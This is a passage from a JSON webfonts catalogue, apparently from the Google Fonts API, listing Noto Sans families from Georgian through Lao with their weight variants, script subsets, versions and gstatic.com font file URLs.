\"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpvnzFj-f5WK0OQV.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpvVzFj-f5WK0OQV.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdps5y1j-f5WK0OQV.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdpsAy1j-f5WK0OQV.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdptny1j-f5WK0OQV.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansgeorgian/v36/PlIaFke5O6RzLfvNNVSitxkr76PRHBC4Ytyq-Gof7PUs4S7zWn-8YDB09HFNdptOy1j-f5WK0OQV.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Glagolitic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"glagolitic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansglagolitic/v15/1q2ZY4-BBFBst88SU_tOj4J-4yuNF_HI4ERK4Amu7nM1.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Gothic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"gothic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansgothic/v15/TuGKUUVzXI5FBtUq5a8bj6wRbzxTFMX40kFQRx0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Grantha\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"grantha\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansgrantha/v17/3y976akwcCjmsU8NDyrKo3IQfQ4o-r8cFeulHc6N.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Gujarati\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_ypFgPM_OdiEH0s.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_wpFwPM_OdiEH0s.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_z3FwPM_OdiEH0s.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_ypFwPM_OdiEH0s.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_ybFwPM_OdiEH0s.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_x3EAPM_OdiEH0s.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_xOEAPM_OdiEH0s.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_wpEAPM_OdiEH0s.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansgujarati/v19/wlpWgx_HC1ti5ViekvcxnhMlCVo3f5pv17ivlzsUB14gg1TMR2Gw4VceEl7MA_wAEAPM_OdiEH0s.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Gunjala Gondi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"gunjala-gondi\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansgunjalagondi/v15/bWto7e7KfBziStx7lIzKPrcSMwcEnCv6DW7n5hcVXYMTK4q1.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Gurmukhi\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"gurmukhi\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansgurmukhi/v20/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG1Oe3bxZ_trdp7h.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosansgurmukhi/v20/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG3OenbxZ_trdp7h.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansgurmukhi/v20/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG0QenbxZ_trdp7h.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansgurmukhi/v20/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG1OenbxZ_trdp7h.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansgurmukhi/v20/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG18enbxZ_trdp7h.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansgurmukhi/v20/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG2QfXbxZ_trdp7h.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansgurmukhi/v20/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG2pfXbxZ_trdp7h.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosansgurmukhi/v20/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG3OfXbxZ_trdp7h.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansgurmukhi/v20/w8g9H3EvQP81sInb43inmyN9zZ7hb7ATbSWo4q8dJ74a3cVrYFQ_bogT0-gPeG3nfXbxZ_trdp7h.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans HK\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"chinese-hongkong\",\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanshk/v21/nKKO-GM_FYFRJvXzVXaAPe9ZUHp1MOv2ObB7.otf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanshk/v21/nKKP-GM_FYFRJvXzVXaAPe9ZmFhTHMX6MKliqQ.otf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanshk/v21/nKKQ-GM_FYFRJvXzVXaAPe9hMnB3Eu7mOQ.otf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanshk/v21/nKKP-GM_FYFRJvXzVXaAPe9ZwFlTHMX6MKliqQ.otf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanshk/v21/nKKP-GM_FYFRJvXzVXaAPe9ZiF9THMX6MKliqQ.otf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanshk/v21/nKKP-GM_FYFRJvXzVXaAPe9ZsF1THMX6MKliqQ.otf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Hanifi Rohingya\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"hanifi-rohingya\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanshanifirohingya/v22/5h17iYsoOmIC3Yu3MDXLDw3UZCgghyOEBBY7hhLNyo3tiaiuSIAqrIYY4j6vvcudK8rN.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanshanifirohingya/v22/5h17iYsoOmIC3Yu3MDXLDw3UZCgghyOEBBY7hhLNyo3tiaiuSIAqrIYq4j6vvcudK8rN.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanshanifirohingya/v22/5h17iYsoOmIC3Yu3MDXLDw3UZCgghyOEBBY7hhLNyo3tiaiuSIAqrIbG5T6vvcudK8rN.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanshanifirohingya/v22/5h17iYsoOmIC3Yu3MDXLDw3UZCgghyOEBBY7hhLNyo3tiaiuSIAqrIb_5T6vvcudK8rN.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Hanunoo\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"hanunoo\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanshanunoo/v17/f0Xs0fCv8dxkDWlZSoXOj6CphMloFsEsEpgL_ix2.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Hatran\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"hatran\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanshatran/v15/A2BBn4Ne0RgnVF3Lnko-0sOBIfL_mM83r1nwzDs.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Hebrew\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v38\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXd4utoiJltutR2g.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiX94qtoiJltutR2g.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXKYqtoiJltutR2g.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXd4qtoiJltutR2g.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXRYqtoiJltutR2g.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXqY2toiJltutR2g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiXkI2toiJltutR2g.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiX942toiJltutR2g.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanshebrew/v38/or3HQ7v33eiDljA1IufXTtVf7V6RvEEdhQlk0LlGxCyaeNKYZC0sqk3xXGiX3o2toiJltutR2g.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Imperial Aramaic\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"imperial-aramaic\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansimperialaramaic/v15/a8IMNpjwKmHXpgXbMIsbTc_kvks91LlLetBr5itQrtdml3YfPNno.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Indic Siyaq Numbers\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"indic-siyaq-numbers\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansindicsiyaqnumbers/v15/6xK5dTJFKcWIu4bpRBjRZRpsIYHabOeZ8UZLubTzpXNHKx2WPOpVd5Iu.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Inscriptional Pahlavi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"inscriptional-pahlavi\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansinscriptionalpahlavi/v15/ll8UK3GaVDuxR-TEqFPIbsR79Xxz9WEKbwsjpz7VklYlC7FCVtqVOAYK0QA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Inscriptional Parthian\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"inscriptional-parthian\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansinscriptionalparthian/v15/k3k7o-IMPvpLmixcA63oYi-yStDkgXuXncL7dzfW3P4TAJ2yklBJ2jNkLlLr.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans JP\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"japanese\",\n        \"latin\"\n      ],\n      \"version\": \"v42\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosansjp/v42/-F6ofjtqLzI2JPCgQBnw7HFQoggM-FNthvIU.otf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQaioq1H1hj-sNFQ.otf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosansjp/v42/-F62fjtqLzI2JPCgQBnw7HFowAIO2lZ9hg.otf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQMisq1H1hj-sNFQ.otf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQei0q1H1hj-sNFQ.otf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQQi8q1H1hj-sNFQ.otf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Javanese\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"javanese\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-28\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosansjavanese/v19/2V01KJkDAIA6Hp4zoSScDjV0Y-eoHAHT-Z3MngEefiidxJnkFFliZYWj4O8.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosansjavanese/v19/2V01KJkDAIA6Hp4zoSScDjV0Y-eoHAHT-Z3MngEefiidxKvkFFliZYWj4O8.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosansjavanese/v19/2V01KJkDAIA6Hp4zoSScDjV0Y-eoHAHT-Z3MngEefiidxEfjFFliZYWj4O8.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosansjavanese/v19/2V01KJkDAIA6Hp4zoSScDjV0Y-eoHAHT-Z3MngEefiidxH7jFFliZYWj4O8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans KR\",\n      \"variants\": [\n        \"100\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"700\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"korean\",\n        \"latin\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2022-09-27\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanskr/v27/Pby6FmXiEBPT4ITbgNA5CgmOsn7uwpYcuH8y.otf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanskr/v27/Pby7FmXiEBPT4ITbgNA5CgmOelzI7rgQsWYrzw.otf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanskr/v27/PbykFmXiEBPT4ITbgNA5Cgm20HTs4JMMuA.otf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanskr/v27/Pby7FmXiEBPT4ITbgNA5CgmOIl3I7rgQsWYrzw.otf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanskr/v27/Pby7FmXiEBPT4ITbgNA5CgmOalvI7rgQsWYrzw.otf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanskr/v27/Pby7FmXiEBPT4ITbgNA5CgmOUlnI7rgQsWYrzw.otf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Kaithi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"kaithi\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanskaithi/v16/buEtppS9f8_vkXadMBJJu0tWjLwjQi0KdoZIKlo.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Kannada\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"kannada\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrDvMzSIMLsPKrkY.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrLvNzSIMLsPKrkY.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrGXNzSIMLsPKrkY.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrDvNzSIMLsPKrkY.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrAnNzSIMLsPKrkY.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrOXKzSIMLsPKrkY.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrNzKzSIMLsPKrkY.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrLvKzSIMLsPKrkY.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanskannada/v21/8vIs7xs32H97qzQKnzfeXycxXZyUmySvZWItmf1fe6TVmgop9ndpS-BqHEyGrJLKzSIMLsPKrkY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Kayah Li\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"kayah-li\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v20\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanskayahli/v20/B50nF61OpWTRcGrhOVJJwOMXdca6Yecki3E06x2jVTX3WCc3CZH4EXLuKVM.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanskayahli/v20/B50nF61OpWTRcGrhOVJJwOMXdca6Yecki3E06x2jVTX3WBU3CZH4EXLuKVM.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanskayahli/v20/B50nF61OpWTRcGrhOVJJwOMXdca6Yecki3E06x2jVTX3WPkwCZH4EXLuKVM.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanskayahli/v20/B50nF61OpWTRcGrhOVJJwOMXdca6Yecki3E06x2jVTX3WMAwCZH4EXLuKVM.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Kharoshthi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"kharoshthi\"\n      ],\n      \"version\": \"v15\",\n      \"lastModified\": \"2022-05-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanskharoshthi/v15/Fh4qPiLjKS30-P4-pGMMXCCfvkc5Vd7KE5z4rFyx5mR1.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Khmer\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"khmer\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYuNAZz4kAbrddiA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYsNAJz4kAbrddiA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYvTAJz4kAbrddiA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYuNAJz4kAbrddiA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYu_AJz4kAbrddiA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYtTB5z4kAbrddiA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYtqB5z4kAbrddiA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYsNB5z4kAbrddiA.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/notosanskhmer/v18/ijw3s5roRME5LLRxjsRb-gssOenAyendxrgV2c-Zw-9vbVUti_Z_dWgtWYskB5z4kAbrddiA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Khojki\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khojki\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanskhojki/v16/-nFnOHM29Oofr2wohFbTuPPKVWpmK_d709jy92k.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Khudawadi\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"khudawadi\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-11-09\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/notosanskhudawadi/v16/fdNi9t6ZsWBZ2k5ltHN73zZ5hc8HANlHIjRnVVXz9MY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Noto Sans Lao\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\"\n      ],\n      \"subsets\": [\n        \"lao\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/notosanslao/v24/bx6lNx2Ol_ixgdYWLm9BwxM3NW6BOkuf763Clj73CiQ_J1Djx9pidOt4ccfdf5MK3riB2w.ttf\",\n        \"200\": 